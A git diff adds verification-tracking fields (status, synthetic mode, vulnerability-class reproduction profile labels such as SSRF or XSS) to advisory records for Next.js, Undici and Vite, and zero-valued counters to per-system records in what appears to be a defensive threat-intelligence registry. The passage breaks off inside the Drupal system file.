b/08-threat-intel/registry/advisories/nextjs--CVE-2025-55173.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json index 11b7e40b..3ca398de 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-57752.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json index cb2aa8c0..7b230d34 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json @@ -51,6 +51,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json index 776f45b5..725abfd8 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json b/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json index 4f6cf174..eb8a1fe4 100644 --- a/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json +++ b/08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json b/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json index 3256c66a..208f207f 100644 --- a/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json +++ b/08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json @@ -65,6 +65,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json b/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json index f897bfc9..db38f2be 100644 --- a/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json +++ b/08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json @@ -58,6 +58,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json b/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json index b293aef1..37c36f11 100644 --- a/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json +++ b/08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json @@ -63,6 +63,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "deserialization-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json b/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json index 92e6f703..569a061a 100644 --- a/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json +++ b/08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json @@ -63,6 +63,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json b/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json index 7c24b014..550c15cb 100644 --- a/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json +++ b/08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json @@ -61,6 +61,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Next.js" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json b/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json index 39be922e..039d0d1e 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2022-31151.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json b/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json index 94b5a3f9..e0691e6b 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2022-32210.json @@ -46,6 +46,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json b/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json index 32e97c59..6afa4ecc 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2023-45143.json @@ -56,6 +56,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json b/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json index 2df788e8..c5ce6032 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2024-30260.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json b/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json index b79c6af8..feaf3f60 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2024-30261.json @@ -54,6 +54,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json b/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json index e5b50dfb..45bf753e 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2025-22150.json @@ -55,6 +55,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json b/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json index 3ba35f1e..854e4db7 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2025-47279.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json index 0a2983de..d93082ba 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-1525.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json index 0248c168..bb0c465c 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-1526.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json index 042fe810..aa3f4f77 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-1527.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json b/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json index eef2cf82..ee7a7d23 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-1528.json @@ -49,6 +49,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json b/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json index 33cfdc1e..5754d354 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-22036.json @@ -48,6 +48,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json b/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json index e72300ae..2e53e906 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-2229.json @@ -52,6 +52,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json b/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json index e8143cd0..bd2bb091 100644 --- a/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json +++ b/08-threat-intel/registry/advisories/undici--CVE-2026-2581.json @@ -47,6 +47,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "ssrf-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Undici" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json b/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json index 99f1cc0a..c7db3322 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2024-23331.json @@ -58,6 +58,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json b/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json index 34834e60..afc02a71 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2024-45811.json @@ -61,6 +61,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json b/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json index fb533532..9a41877b 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2024-45812.json @@ -67,6 +67,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "xss-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json b/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json index ac9214e1..f445ad0e 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-24010.json @@ -53,6 +53,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "file-upload-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json b/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json index 709f93e8..ed28908a 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-30208.json @@ -59,6 +59,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json b/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json index cecec3d0..bfbdb3ed 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-31125.json @@ -56,6 +56,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json b/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json index 04804082..28cd8aae 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-31486.json @@ -57,6 +57,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json b/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json index 59820302..b340e8c8 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-32395.json @@ -55,6 +55,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json b/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json index fe7430de..43340ead 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-46565.json @@ -55,6 +55,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "file-upload-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json b/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json index 6216f915..8163ca21 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-58751.json @@ -57,6 +57,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json b/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json index 07ef1d92..ce1360c2 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-58752.json @@ -58,6 +58,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "proxy-boundary-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json b/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json index 722b5dfb..d9f30800 100644 --- a/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json +++ b/08-threat-intel/registry/advisories/vite--CVE-2025-62522.json @@ -56,6 +56,19 @@ ], "status": "generated", "triage_reasons": [], + "verification_status": "triage-manual", + "verification_mode": "synthetic", + "last_verified_at": null, + "last_run_id": null, + "evidence_bundle": null, + "browser_evidence": { + "required": false, + "present": false, + "refs": [] + }, + "repro_profile_id": "file-upload-generic", + "artifact_mode": "synthetic", + "blocked_reason": null, "metadata": { "source_names": [ "OSV Vite" diff --git a/08-threat-intel/registry/systems/adminer.json b/08-threat-intel/registry/systems/adminer.json index f614b179..58196fa5 100644 --- a/08-threat-intel/registry/systems/adminer.json +++ b/08-threat-intel/registry/systems/adminer.json @@ -12,5 +12,9 @@ "xss-output-encoding", "authz-server-side-recheck" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/adobe-commerce.json b/08-threat-intel/registry/systems/adobe-commerce.json index 29b9452b..7a60e8a4 100644 --- a/08-threat-intel/registry/systems/adobe-commerce.json +++ b/08-threat-intel/registry/systems/adobe-commerce.json @@ -14,5 +14,9 @@ "xss-output-encoding", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/angular.json b/08-threat-intel/registry/systems/angular.json index f174eed1..3fcc11e5 100644 --- a/08-threat-intel/registry/systems/angular.json +++ b/08-threat-intel/registry/systems/angular.json @@ -13,5 +13,9 @@ "template-injection-guard", "csp-trusted-types" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/apache-httpd.json b/08-threat-intel/registry/systems/apache-httpd.json index d94d186d..be913fb2 100644 --- a/08-threat-intel/registry/systems/apache-httpd.json +++ b/08-threat-intel/registry/systems/apache-httpd.json @@ -13,5 +13,9 @@ "proxy-trust-boundary", "path-traversal-guard" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/apache-tomcat.json b/08-threat-intel/registry/systems/apache-tomcat.json index 09299103..0fd8e6a4 100644 --- a/08-threat-intel/registry/systems/apache-tomcat.json +++ b/08-threat-intel/registry/systems/apache-tomcat.json @@ -13,5 +13,9 @@ "authz-server-side-recheck", "path-traversal-guard" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/aspnet-core.json b/08-threat-intel/registry/systems/aspnet-core.json index 13bd51e9..feb9372f 100644 --- a/08-threat-intel/registry/systems/aspnet-core.json +++ b/08-threat-intel/registry/systems/aspnet-core.json @@ -13,5 +13,9 @@ "xss-output-encoding", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/astro.json b/08-threat-intel/registry/systems/astro.json index 2a7f16ca..2e4c3809 100644 --- a/08-threat-intel/registry/systems/astro.json +++ b/08-threat-intel/registry/systems/astro.json @@ -12,5 +12,9 @@ "authz-server-side-recheck", "csp-trusted-types" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/caddy.json b/08-threat-intel/registry/systems/caddy.json index 84291210..fbb572c2 100644 --- a/08-threat-intel/registry/systems/caddy.json +++ b/08-threat-intel/registry/systems/caddy.json @@ -12,5 +12,9 @@ "proxy-trust-boundary", "request-smuggling-boundary" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/directus.json b/08-threat-intel/registry/systems/directus.json index fe0b477c..08102242 100644 --- a/08-threat-intel/registry/systems/directus.json +++ b/08-threat-intel/registry/systems/directus.json @@ -13,5 +13,9 @@ "token-cookie-storage", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/discourse.json b/08-threat-intel/registry/systems/discourse.json index 503e70f4..922048e2 100644 --- a/08-threat-intel/registry/systems/discourse.json +++ b/08-threat-intel/registry/systems/discourse.json @@ -13,5 +13,9 @@ "xss-output-encoding", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/django.json b/08-threat-intel/registry/systems/django.json index b64fb6b1..002208b2 100644 --- a/08-threat-intel/registry/systems/django.json +++ b/08-threat-intel/registry/systems/django.json @@ -13,5 +13,9 @@ "path-traversal-guard", "file-upload-validation" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 0, "items": [] } diff --git a/08-threat-intel/registry/systems/drupal.json b/08-threat-intel/registry/systems/drupal.json index f3b644c9..f417c763 100644 --- a/08-threat-intel/registry/systems/drupal.json +++ b/08-threat-intel/registry/systems/drupal.json @@ -14,5 +14,9 @@ "file-upload-validation", "plugin-extension-trust-policy" ], + "verified_real": 0, + "verified_synthetic": 0, + "blocked_count": 0, + "manual_count": 